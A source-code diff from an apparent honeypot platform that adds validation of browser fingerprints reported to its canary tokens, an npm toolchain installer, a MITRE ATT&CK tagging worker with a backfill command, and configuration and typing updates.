+    informational. Returns a flat list of per-token dicts (with an added
+    ``decky_name`` key) across all deckies.
+    """
+    from decnet.topology.persistence import hydrate
+
+    hydrated = await hydrate(repo, topology_id)
+    if hydrated is None:
+        log.warning(
+            "canary.seed_baseline_topology: topology %s not found", topology_id,
+        )
+        return []
+
+    out: list[dict[str, Any]] = []
+    for decky in hydrated["deckies"]:
+        cfg = decky.get("decky_config") or {}
+        decky_name = cfg.get("name") or decky.get("name")
+        if not decky_name:
+            continue
+        services = decky.get("services") or []
+        container = resolve_topology_container(topology_id, decky_name, services)
+        # MazeNET deckies don't carry an OS persona today; default to
+        # linux (every base image we ship is Linux).
+        rows = await seed_baseline(
+            decky_name, repo,
+            persona="linux", created_by=created_by, bus=bus,
+            container=container,
+        )
+        for r in rows:
+            r["decky_name"] = decky_name
+            out.append(r)
+    return out
--- a/decnet/canary/worker.py
+++ b/decnet/canary/worker.py
@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
 from __future__ import annotations

 import asyncio
+import base64
+import binascii
+import json
 import os
+import time
+import uuid
 from datetime import datetime, timezone
-from typing import Optional
+from typing import Any, Optional

 from fastapi import FastAPI, Request, Response

@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
 )


+# Namespace used by fingerprint generators to derive mint UUID.
+# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
+_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
+
+# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
+# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
+# Not shared across worker restarts or processes — acceptable for MVP.
+_FP_RATE_WINDOW_S = 60
+_FP_RATE_LIMIT = 30
+_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
+
+
+def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
+    key = (token_uuid, src_ip)
+    now = time.monotonic()
+    cutoff = now - _FP_RATE_WINDOW_S
+    bucket = _fp_rate_buckets.get(key, [])
+    bucket = [t for t in bucket if t > cutoff]
+    if len(bucket) >= _FP_RATE_LIMIT:
+        _fp_rate_buckets[key] = bucket
+        return False
+    bucket.append(now)
+    _fp_rate_buckets[key] = bucket
+    return True
+
+
+def _is_valid_fp_shape(fp: dict) -> bool:
+    """Layer B — structural sanity check on a decoded fingerprint blob."""
+    if not isinstance(fp.get("mint"), str) or not fp["mint"]:
+        return False
+    known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
+    present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
+    return present >= 3
+
+
 def _http_base() -> str:
    return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")

@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:

    @app.get("/c/{slug}")
    async def callback(slug: str, request: Request) -> Response:
+        raw_nonce = request.query_params.get("k")
+        fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
+        merged_headers = dict(request.headers)
+        if fp_meta:
+            merged_headers.update(fp_meta)
        await _record_hit(
            repo, bus,
            slug=slug,
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
            user_agent=request.headers.get("user-agent"),
            request_path=str(request.url.path),
            dns_qname=None,
-            raw_headers=dict(request.headers),
+            raw_headers=merged_headers,
+            parsed_fp=parsed_fp,
+            raw_nonce=raw_nonce,
        )
        # Always 200 with a tiny image so the attacker's client sees
        # a "success" — same return regardless of whether the slug is
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
    return app


+# Per-chunk size cap.  Real fingerprints fit in one ~3KB GET; honest
+# overflow is handled via chunking (s/i/n + d).  Anything larger than
+# this on a single request is junk, so we drop it instead of letting an
+# attacker inflate a trigger row indefinitely.
+_FP_CHUNK_MAX = 8 * 1024
+
+
+def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
+    """Decode fingerprint-payload query params into (meta_dict, parsed_fp).
+
+    The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
+
+    * ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
+    * ``?d=<b64url-json>`` — single-shot fingerprint dump.
+    * ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
+
+    Returns a tuple of:
+    - ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
+    - ``parsed_fp`` — the decoded single-shot fingerprint dict, or ``None`` when
+      ``?d=`` is absent, oversized, chunked, or does not decode to a JSON object.
+    """
+    out: dict[str, Any] = {}
+    parsed_fp: Optional[dict] = None
+    if not qp:
+        return out, parsed_fp
+    o = qp.get("o") if hasattr(qp, "get") else None
+    if o:
+        out["_fp_open"] = "1"
+    d = qp.get("d") if hasattr(qp, "get") else None
+    if not d:
+        return out, parsed_fp
+    if len(d) > _FP_CHUNK_MAX:
+        out["_fp_oversize"] = "1"
+        return out, parsed_fp
+
+    sid = qp.get("s")
+    idx = qp.get("i")
+    total = qp.get("n")
+    if sid and idx and total:
+        out["_fp_sid"] = sid
+        out["_fp_idx"] = idx
+        out["_fp_total"] = total
+        out["_fp_chunk"] = d
+        return out, parsed_fp
+
+    # Single-shot: decode here; validation runs in _record_hit (stored nonce
+    # at hand). RecursionError: deeply nested JSON must not escape the handler.
+    try:
+        padded = d + "=" * (-len(d) % 4)
+        raw = base64.urlsafe_b64decode(padded.encode("ascii"))
+        parsed = json.loads(raw.decode("utf-8"))
+    except (binascii.Error, ValueError, UnicodeDecodeError, RecursionError):
+        out["_fp_decode_error"] = "1"
+        return out, parsed_fp
+    if isinstance(parsed, dict):
+        parsed_fp = parsed
+    else:
+        out["_fp_decode_error"] = "1"
+    return out, parsed_fp
+
+
 def _client_ip(request: Request) -> str:
    # Honor X-Forwarded-For if the operator deployed behind a reverse
    # proxy. Take the leftmost address in the chain; everything after
@@ -154,16 +262,58 @@ async def _record_hit(
    request_path: Optional[str],
    dns_qname: Optional[str],
    raw_headers: Optional[dict],
+    parsed_fp: Optional[dict] = None,
+    raw_nonce: Optional[str] = None,
 ) -> None:
    """Resolve slug -> token, persist a trigger, publish on the bus.

    Unknown slugs are silently swallowed: returning the same response
    for known and unknown slugs is the stealth posture, and persisting
    every random scan would clutter the DB.
+
+    When *parsed_fp* is present (single-shot fingerprint decode succeeded),
+    it is validated through four layers before being merged into raw_headers:
+    A) nonce match against CanaryToken.fingerprint_nonce,
+    B) structural shape check,
+    C) mint UUID consistency,
+    D) per-(token, IP) rate limit.
+    Each failure drops ``_fp`` and sets ``_fp_invalid_{nonce,shape,mint}`` or
+    ``_fp_rate_limited``. The trigger row always lands — the GET hit is itself forensic.
    """
    token = await repo.get_canary_token_by_slug(slug)
    if token is None:
        return
+
+    final_headers: dict[str, Any] = dict(raw_headers or {})
+
+    if parsed_fp is not None:
+        stored_nonce: Optional[str] = token.get("fingerprint_nonce")
+
+        # Layer A — nonce
+        if stored_nonce is not None and raw_nonce != stored_nonce:
+            final_headers["_fp_invalid_nonce"] = "1"
+            parsed_fp = None
+
+        # Layer B — shape (only when nonce passed or no nonce enforced)
+        if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
+            final_headers["_fp_invalid_shape"] = "1"
+            parsed_fp = None
+
+        # Layer C — mint UUID consistency
+        if parsed_fp is not None:
+            expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
+            if parsed_fp.get("mint") != expected_mint:
+                final_headers["_fp_invalid_mint"] = "1"
+                parsed_fp = None
+
+        # Layer D — rate limit
+        if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
+            final_headers["_fp_rate_limited"] = "1"
+            parsed_fp = None
+
+        if parsed_fp is not None:
+            final_headers["_fp"] = parsed_fp
+
    trigger_id = await repo.record_canary_trigger({
        "token_uuid": token["uuid"],
        "occurred_at": datetime.now(timezone.utc),
@@ -171,7 +321,7 @@ async def _record_hit(
        "user_agent": user_agent,
        "request_path": request_path,
        "dns_qname": dns_qname,
-        "raw_headers": raw_headers or {},
+        "raw_headers": final_headers,
    })
    try:
        await bus.publish(
@@ -189,6 +339,22 @@ async def _record_hit(
    except Exception as e:  # noqa: BLE001 — best effort
        log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)

+    # Auto-deregister fingerprint canaries after the first valid fingerprint
+    # is collected. Slug goes dark; the stealth posture means the attacker
+    # sees the same 200 + GIF on the next hit — nothing reveals the revocation.
+    # Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
+    # http/dns canaries are NOT auto-revoked.
+    if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
+        try:
+            await repo.update_canary_token_state(token["uuid"], "revoked")
+            await bus.publish(
+                topics.canary(token["uuid"], topics.CANARY_REVOKED),
+                {"token_id": token["uuid"], "trigger_id": trigger_id,
+                 "reason": "fingerprint_collected"},
+            )
+        except Exception as e:  # noqa: BLE001 — trigger row already landed; best effort
+            log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
+

 # ---------------------------- DNS surface --------------------------------

@@ -214,7 +380,7 @@ async def _start_dns_server(
        local_addr=(_dns_bind(), _dns_port()),
    )
    log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
-    return transport  # type: ignore[return-value]
+    return transport


 # ---------------------------- entry point --------------------------------
--- a/decnet/cli/init.py
+++ b/decnet/cli/init.py
@@ -39,6 +39,7 @@ from . import (
    swarm,
    swarmctl,
    topology,
+    ttp,
    updater,
    web,
    webhook,
@@ -59,7 +60,7 @@ for _mod in (
    swarm,
    deploy, lifecycle, workers, inventory,
    web, profiler, orchestrator, realism, reconciler, sniffer, db,
-    topology, bus, geoip, init, webhook, canary,
+    topology, bus, geoip, init, webhook, canary, ttp,
 ):
    _mod.register(app)

--- a/decnet/cli/canary.py
+++ b/decnet/cli/canary.py
@@ -1,8 +1,13 @@
 """``decnet canary`` — HTTP + DNS callback receiver for canary tokens.

-Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
-``@app.command(name="canary")`` Typer entry point that delegates to
-:func:`decnet.canary.worker.run`.
+Two entry points share this module:
+
+* ``decnet canary`` — runs the worker process. Mirrors the shape of
+  :mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
+  systemd unit so its argv must stay stable.
+* ``decnet canary-install-toolchain`` — provisions the Node side of
+  the fingerprint-canary obfuscator. Idempotent; safe to call from
+  the API service unit's ``ExecStartPre``.

 Not master-only — any host that hosts deckies can run its own
 canary worker (the bus events stay local; the webhook worker on
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
 """
 from __future__ import annotations

+import shutil
+import subprocess  # nosec B404 — npm exec is the whole point of the toolchain installer
+from pathlib import Path
+
 import typer

 from . import utils as _utils
 from .utils import console, log

+_TOOLCHAIN_TIMEOUT_S = 180
+

 def register(app: typer.Typer) -> None:
    @app.command(name="canary")
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
            asyncio.run(run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Canary worker stopped.[/]")
+
+    @app.command(name="canary-install-toolchain")
+    def canary_install_toolchain(
+        npm_bin: str = typer.Option(
+            "npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
+        ),
+    ) -> None:
+        """Install the Node-side toolchain used by fingerprint canaries.
+
+        Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
+        directory so the obfuscator's helper script can ``require()``
+        ``javascript-obfuscator`` at mint time. Requires Node >= 18.
+
+        Idempotent: re-running on an already-installed tree is fast
+        (npm short-circuits when ``node_modules/`` is up-to-date).
+        """
+        import decnet.canary as _canary_pkg
+        canary_dir = Path(_canary_pkg.__file__).resolve().parent
+        if not (canary_dir / "package.json").is_file():
+            console.print(
+                f"[red]canary package.json not found under {canary_dir}; "
+                "wheel may be missing the JS toolchain payload.[/]"
+            )
+            raise typer.Exit(code=2)
+        if shutil.which(npm_bin) is None:
+            console.print(
+                f"[red]npm executable {npm_bin!r} not found on PATH. "
+                "Install Node >= 18 and re-run.[/]"
+            )
+            raise typer.Exit(code=2)
+        console.print(
+            f"[cyan]installing canary toolchain[/] in {canary_dir}",
+        )
+        try:
+            proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
+                [npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
+                cwd=str(canary_dir),
+                capture_output=True, text=True,
+                timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
+            )
+        except subprocess.TimeoutExpired:
+            console.print("[red]npm install timed out after 3 minutes[/]")
+            raise typer.Exit(code=3) from None
+        if proc.returncode != 0:
+            console.print(
+                f"[red]npm install failed rc={proc.returncode}[/]\n"
+                f"{proc.stderr.strip()}"
+            )
+            raise typer.Exit(code=proc.returncode)
+        console.print("[green]canary toolchain ready[/]")
--- a/decnet/cli/gating.py
+++ b/decnet/cli/gating.py
@@ -30,6 +30,10 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
    "mutate", "listener", "profiler",
    "services", "distros", "correlate", "archetypes", "web",
    "db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
+    # `ttp` runs on agents — local SMTP decoys persist .eml files into the
+    # agent's artifacts tree and the EmailLifter disk-reaches them in-process
+    # (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
+    "ttp-backfill",
 })
 MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
    {"swarm", "topology", "geoip", "realism"}
@@ -65,7 +69,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
        return
    _app.registered_commands = [
        c for c in _app.registered_commands
-        if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS
+        if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
    ]
    _app.registered_groups = [
        g for g in _app.registered_groups
--- a/decnet/cli/init.py
+++ b/decnet/cli/init.py
@@ -44,6 +44,12 @@ _CONFIG_PLACEHOLDER = """\
 # EnvironmentFile= — never in a group-readable INI.

 [decnet]
+# DECNET-service user/group as configured at `decnet init` time.
+# Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
+# so the same user name can have different numeric uids on master vs
+# agents without breaking artifact ownership.
+api-user = {api_user}
+api-group = {api_group}
 # mode = master                          # or "agent"

 # [api]
@@ -74,6 +80,7 @@ _CONFIG_PLACEHOLDER = """\
 # master-host = 10.0.0.1
 # syslog-port = 6514
 # swarmctl-port = 8770
+# swarmctl-host = 127.0.0.1

 # [logging]
 # system-log = /var/log/decnet/decnet.system.log
@@ -197,14 +204,17 @@ def _ensure_dir(
    return f"skip: {path} already present" if existed else "ok"


-def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
+def _ensure_config(
+    path: Path, group: str, *, user: str, dry_run: bool,
+) -> str:
    if path.exists():
        return f"skip: {path} already present"
    if dry_run:
        console.print(f"  [dim]would write:[/] {path}")
        return "ok"
    path.parent.mkdir(parents=True, exist_ok=True)
-    path.write_text(_CONFIG_PLACEHOLDER)
+    rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
+    path.write_text(rendered)
    try:
        os.chmod(path, 0o640)
        gid = grp.getgrnam(group).gr_gid
@@ -601,7 +611,7 @@ def register(app: typer.Typer) -> None:
        # (Path("/").  / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
        _install_rel = install_dir.lstrip("/")

-        required_tools = ("systemctl",) if deinit else (
+        required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
            "systemctl", "useradd", "groupadd", "systemd-tmpfiles",
        )
        if deinit:
@@ -658,7 +668,7 @@ def register(app: typer.Typer) -> None:
            )
            _step(
                "systemctl daemon-reload",
-                lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
+                lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],  # type: ignore[func-returns-value]
            )
            _step(
                f"remove {etc_decnet / 'decnet.ini'}",
@@ -754,6 +764,13 @@ def register(app: typer.Typer) -> None:
            (pfx / _install_rel, 0o755, user, group),
            (pfx / "var/lib/decnet", 0o750, user, group),
            (pfx / "var/lib/decnet/geoip", 0o755, user, group),
+            # DEBT-035 / DEBT-047: artifact root carries setgid (the
+            # 0o2... bit) so every file written under it inherits the
+            # decnet group regardless of which container's uid created
+            # it. Group-write (0o2775) lets the API process and the
+            # local TTP worker read each other's outputs without a
+            # manual chown after every fresh deploy.
+            (pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
            (pfx / "var/log/decnet", 0o750, user, group),
            (etc_decnet, 0o755, "root", group),
            (pfx / "run/decnet", 0o755, "root", group),
@@ -775,12 +792,15 @@ def register(app: typer.Typer) -> None:
        for path, mode, d_owner, d_group in dirs:
            _step(
                f"ensure dir {path}",
-                lambda p=path, m=mode, o=d_owner, g=d_group:
+                lambda p=path, m=mode, o=d_owner, g=d_group:  # type: ignore[misc]
                    _ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
            )
        _step(
            f"write {etc_decnet / 'decnet.ini'}",
-            lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
+            lambda: _ensure_config(
+                etc_decnet / "decnet.ini", group,
+                user=user, dry_run=dry_run,
+            ),
        )
        _step(
            "install systemd units",
@@ -812,7 +832,7 @@ def register(app: typer.Typer) -> None:
        )
        _step(
            "systemctl daemon-reload",
-            lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
+            lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],  # type: ignore[func-returns-value]
        )

        if no_start:
@@ -823,7 +843,7 @@ def register(app: typer.Typer) -> None:
            _step(
                "systemctl enable --now decnet.target",
                lambda: (
-                    _run(
+                    _run(  # type: ignore[func-returns-value]
                        ["systemctl", "enable", "--now", "decnet.target"],
                        dry_run=dry_run,
                    ),
--- a/decnet/cli/swarmctl.py
+++ b/decnet/cli/swarmctl.py
@@ -16,8 +16,16 @@ from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command()
    def swarmctl(
-        port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
-        host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
+        port: int = typer.Option(
+            8770, "--port",
+            envvar="DECNET_SWARMCTL_PORT",
+            help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
+        ),
+        host: str = typer.Option(
+            "127.0.0.1", "--host",
+            envvar="DECNET_SWARMCTL_HOST",
+            help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
+        ),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
        no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
        tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
--- a/decnet/cli/topology.py
+++ b/decnet/cli/topology.py
@@ -233,8 +233,8 @@ def _delete(
        topo = await repo.get_topology(topology_id)
        if topo is None:
            return False, "not-found"
-        if topo["status"] in _RUNNING:
-            return False, str(topo["status"])
+        if topo.status in _RUNNING:
+            return False, str(topo.status)
        ok = await repo.delete_topology_cascade(topology_id)
        return ok, None

--- a/decnet/cli/ttp.py
+++ b/decnet/cli/ttp.py
@@ -0,0 +1,309 @@
+"""``decnet ttp`` — TTP-tagging worker and admin commands.
+
+Two flat commands share this module:
+
+* ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
+  ``attacker.session.ended`` / ``attacker.observed`` /
+  ``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
+  ``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
+  dispatches each event through :class:`CompositeTagger` (RuleEngine +
+  Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
+  lifters), persists ``ttp_tag`` rows via the idempotent
+  ``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
+  ``ttp.rule.fired.<technique_id>`` only when the insert returned a
+  non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
+  §"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
+  so its argv must stay stable.
+
+* ``decnet ttp-backfill`` — replays historical events (shell commands
+  recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
+  through the live tagger. Writes ``ttp_tag`` rows using the same
+  idempotent insert path. **Does not publish** to the bus — replay must
+  not re-trigger SIEM/webhook fan-out on already-attributed events.
+
+Both are master-only — gated via ``MASTER_ONLY_COMMANDS`` in
+:mod:`decnet.cli.gating`.
+"""
+from __future__ import annotations
+
+import asyncio
+import time
+from datetime import datetime, timedelta, timezone
+from typing import Any
+
+import typer
+
+from decnet.ttp.factory import CompositeTagger, get_tagger
+
+from . import utils as _utils
+from .utils import console, log
+
+
+_BACKFILL_SOURCES = ("command", "canary", "all")
+
+
+def register(app: typer.Typer) -> None:
+    @app.command(name="ttp")
+    def ttp(
+        poll_interval_secs: float = typer.Option(
+            60.0, "--poll-interval", "-i",
+            help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
+        ),
+        daemon: bool = typer.Option(
+            False, "--daemon", "-d",
+            help="Detach to background as a daemon process",
+        ),
+    ) -> None:
+        """TTP-tagging worker — MITRE ATT&CK technique tagging."""
+        from decnet.ttp.worker import run_ttp_worker_loop
+        from decnet.web.dependencies import repo
+
+        if daemon:
+            log.info("ttp daemonizing poll=%s", poll_interval_secs)
+            _utils._daemonize()
+
+        log.info("ttp command invoked poll=%s", poll_interval_secs)
+        console.print(
+            f"[bold cyan]TTP tagging worker starting[/] "
+            f"poll={poll_interval_secs}s"
+        )
+        console.print("[dim]Press Ctrl+C to stop[/]")
+
+        async def _run() -> None:
+            await repo.initialize()
+            await run_ttp_worker_loop(
+                repo, poll_interval_secs=poll_interval_secs,
+            )
+
+        try:
+            asyncio.run(_run())
+        except KeyboardInterrupt:
+            console.print("\n[yellow]TTP tagging worker stopped.[/]")
+
+    @app.command(name="ttp-backfill")
+    def ttp_backfill(
+        since_days: int = typer.Option(
+            7, "--since-days", "-s",
+            min=1, max=3650,
+            help="Replay events whose source row is newer than N days ago.",
+        ),
+        source: str = typer.Option(
+            "all", "--source",
+            help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
+        ),
+        dry_run: bool = typer.Option(
+            False, "--dry-run",
+            help="Run the tagger but skip insert_tags. Reports counts only.",
+        ),
+        batch_size: int = typer.Option(
+            500, "--batch-size",
+            min=1, max=100_000,
+            help="Number of tags accumulated before each repo.insert_tags call.",
+        ),
+    ) -> None:
+        """Replay historical attacker activity through the live tagger.
+
+        Walks ``Attacker.commands`` (per-IP shell-command history) and
+        ``CanaryTrigger`` (canary callback log) since N days ago,
+        builds the same :class:`TaggerEvent` shape the live worker
+        emits, and persists tags via the idempotent INSERT OR IGNORE
+        write. Re-running is safe — a second pass over identical
+        source rows reports ``inserted=0``.
+
+        Bus publish is intentionally suppressed; SIEM / webhook fan-out
+        sees only live events, never replays.
+        """
+        from decnet.cli.gating import _require_master_mode
+        from decnet.web.dependencies import repo
+
+        _require_master_mode("ttp-backfill")
+
+        if source not in _BACKFILL_SOURCES:
+            console.print(
+                f"[red]invalid --source {source!r}; expected one of "
+                f"{_BACKFILL_SOURCES}[/]"
+            )
+            raise typer.Exit(code=2)
+
+        cutoff = datetime.now(tz=timezone.utc) - timedelta(days=since_days)
+        console.print(
+            f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
+            f"source={source} dry_run={dry_run} batch_size={batch_size}"
+        )
+
+        async def _run() -> None:
+            await repo.initialize()
+            await _backfill(
+                repo,
+                cutoff=cutoff,
+                sources=_resolve_sources(source),
+                dry_run=dry_run,
+                batch_size=batch_size,
+            )
+
+        try:
+            asyncio.run(_run())
+        except KeyboardInterrupt:
+            console.print("\n[yellow]Backfill interrupted.[/]")
+
+
+def _resolve_sources(name: str) -> tuple[str, ...]:
+    if name == "all":
+        return ("command", "canary")
+    return (name,)
+
+
+async def _backfill(
+    repo: Any,
+    *,
+    cutoff: datetime,
+    sources: tuple[str, ...],
+    dry_run: bool,
+    batch_size: int,
+) -> None:
+    """Run the backfill loop for each requested source, in order.
+
+    A single tagger from :func:`get_tagger` is reused for every
+    source. When it is a :class:`CompositeTagger`, one
+    ``watch_store()`` task is started per watchable and all of them
+    are cancelled and awaited on exit. Counts are printed by the
+    per-source helpers; ``"command"`` runs before ``"canary"``.
+    """
+    # Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
+    # to inject a recording fake without touching the global factory.
+    tagger = get_tagger()
+    watch_tasks: list[asyncio.Task[None]] = []
+    if isinstance(tagger, CompositeTagger):
+        for watchable in tagger.iter_watchables():
+            watch_tasks.append(asyncio.create_task(watchable.watch_store()))
+    # Best-effort head start, not a barrier: a fixed 50 ms pause lets
+    # the watch tasks begin running before we feed the first event.
+    await asyncio.sleep(0.05)
+
+    try:
+        if "command" in sources:
+            await _backfill_commands(
+                repo, tagger, cutoff=cutoff,
+                dry_run=dry_run, batch_size=batch_size,
+            )
+        if "canary" in sources:
+            await _backfill_canaries(
+                repo, tagger, cutoff=cutoff,
+                dry_run=dry_run, batch_size=batch_size,
+            )
+    finally:
+        for task in watch_tasks:
+            task.cancel()
+        for task in watch_tasks:
+            try:
+                await task
+            except (asyncio.CancelledError, Exception):  # noqa: BLE001
+                pass
+
+
+async def _backfill_commands(
+    repo: Any,
+    tagger: Any,
+    *,
+    cutoff: datetime,
+    dry_run: bool,
+    batch_size: int,
+) -> None:
+    from decnet.ttp.base import TaggerEvent
+
+    started = time.monotonic()
+    rows_seen = 0
+    cmds_seen = 0
+    inserted = 0
+    pending: list[Any] = []
+
+    async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
+        rows_seen += 1
+        for idx, cmd in enumerate(commands):
+            cmds_seen += 1
+            text = cmd.get("command_text") or cmd.get("text")
+            if not isinstance(text, str):
+                continue
+            cmd_id = (
+                cmd.get("id")
+                or cmd.get("uuid")
+                or cmd.get("command_id")
+                or f"{attacker.uuid}#cmd{idx}"
+            )
+            event = TaggerEvent(
+                source_kind="command",
+                source_id=str(cmd_id),
+                attacker_uuid=attacker.uuid,
+                identity_uuid=getattr(attacker, "identity_id", None),
+                session_id=cmd.get("session_id"),
+                decky_id=cmd.get("decky_id") or cmd.get("decky"),
+                payload={**cmd, "command_text": text},
+            )
+            tags = await tagger.tag(event)
+            if tags:
+                pending.extend(tags)
+            if len(pending) >= batch_size:
+                inserted += await _flush(repo, pending, dry_run)
+                pending = []
+    if pending:
+        inserted += await _flush(repo, pending, dry_run)
+    elapsed = time.monotonic() - started
+    console.print(
+        f"source=command rows={rows_seen} commands={cmds_seen} "
+        f"inserted={inserted} dry_run={dry_run} elapsed_s={elapsed:.2f}"
+    )
+
+
+async def _backfill_canaries(
+    repo: Any,
+    tagger: Any,
+    *,
+    cutoff: datetime,
+    dry_run: bool,
+    batch_size: int,
+) -> None:
+    from decnet.ttp.base import TaggerEvent
+
+    started = time.monotonic()
+    rows_seen = 0
+    inserted = 0
+    pending: list[Any] = []
+
+    async for trigger in repo.iter_canary_triggers_since(cutoff):
+        rows_seen += 1
+        event = TaggerEvent(
+            source_kind="canary_fingerprint",
+            source_id=trigger.uuid,
+            attacker_uuid=trigger.attacker_id,
+            identity_uuid=None,
+            session_id=None,
+            decky_id=None,
+            payload={
+                "token_uuid": trigger.token_uuid,
+                "src_ip": trigger.src_ip,
+                "ua_signature": trigger.user_agent or "",
+                "user_agent": trigger.user_agent,
+                "request_path": trigger.request_path,
+                "dns_qname": trigger.dns_qname,
+                "headers": trigger.headers(),
+            },
+        )
+        tags = await tagger.tag(event)
+        if tags:
+            pending.extend(tags)
+        if len(pending) >= batch_size:
+            inserted += await _flush(repo, pending, dry_run)
+            pending = []
+    if pending:
+        inserted += await _flush(repo, pending, dry_run)
+    elapsed = time.monotonic() - started
+    console.print(
+        f"source=canary rows={rows_seen} inserted={inserted} "
+        f"dry_run={dry_run} elapsed_s={elapsed:.2f}"
+    )
+
+
+async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
+    if dry_run:
+        return 0
+    return int(await repo.insert_tags(tags))
--- a/decnet/cli/utils.py
+++ b/decnet/cli/utils.py
@@ -11,7 +11,7 @@ import signal
 import subprocess  # nosec B404
 import sys
 from pathlib import Path
-from typing import Optional
+from typing import Any, Callable, Optional

 import typer
 from rich.console import Console
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
    return None


-def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
+def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
    """Return the microservice registry for health-check and relaunch.

    On agents these run as systemd units invoking /usr/local/bin/decnet,
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"


 def _swarmctl_base_url(url: Optional[str]) -> str:
-    return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL)
+    return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL


 def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
--- a/decnet/cli/workers.py
+++ b/decnet/cli/workers.py
@@ -192,6 +192,70 @@ def register(app: typer.Typer) -> None:
        except KeyboardInterrupt:
            console.print("\n[yellow]Reuse correlator stopped.[/]")

+    @app.command(name="attribution")
+    def attribution(
+        multi_actor_tick_secs: float = typer.Option(
+            60.0, "--multi-actor-tick", "-t",
+            help=(
+                "Cross-primitive multi_actor correlator tick interval (seconds). "
